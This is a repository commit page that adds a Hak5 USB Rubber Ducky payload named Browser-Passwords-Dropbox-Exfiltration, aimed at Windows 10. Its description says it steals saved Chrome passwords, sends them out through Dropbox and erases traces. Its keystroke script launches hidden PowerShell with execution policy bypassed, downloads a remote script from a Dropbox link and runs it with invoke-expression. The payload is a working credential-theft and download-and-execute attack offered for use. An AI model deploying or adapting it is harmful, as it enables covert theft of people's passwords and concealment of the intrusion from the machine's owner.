hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create payload.txt

pull/116/head
DIYS.py 2022-08-10 21:05:47 -04:00 committed by GitHub
parent 4626f3c9c1
commit bf506c8368
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/payload.txt Normal file
View File

@ -0,0 +1,28 @@
#########################################################################################################
# | #
# Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #
# Author : DIYS.py | | _ \_ _\ \ / / ___| _ __ _ _ #
# Version : 1.0 | | | | | | \ V /\___ \ | '_ \| | | | #
# Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #
# Target : Windows 10 | |____/___| |_| |____(_) .__/ \__, | #
# Mode : HID | |_| |___/ #
# Props : I am Jakoby, NULLSESSION0X | #
# | #
#########################################################################################################
REM Title: Browser-Passwords-Dropbox-Exfiltration
REM Author: DIYS.py
REM Description: Opens PowerShell hidden, grabs Chrome passwords, saves as a cleartext file and exfiltrates info via Dropbox.
REM Then it cleans up traces of what you have done after.
REM Target: Windows 10 (PowerShell + Chrome)
REM Version: 1.0
REM Category: Credentials, Exfiltration
DELAY 3000
GUI r
DELAY 250
STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://< Your Shared link for the intended file>?dl=1; invoke-expression $pl
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly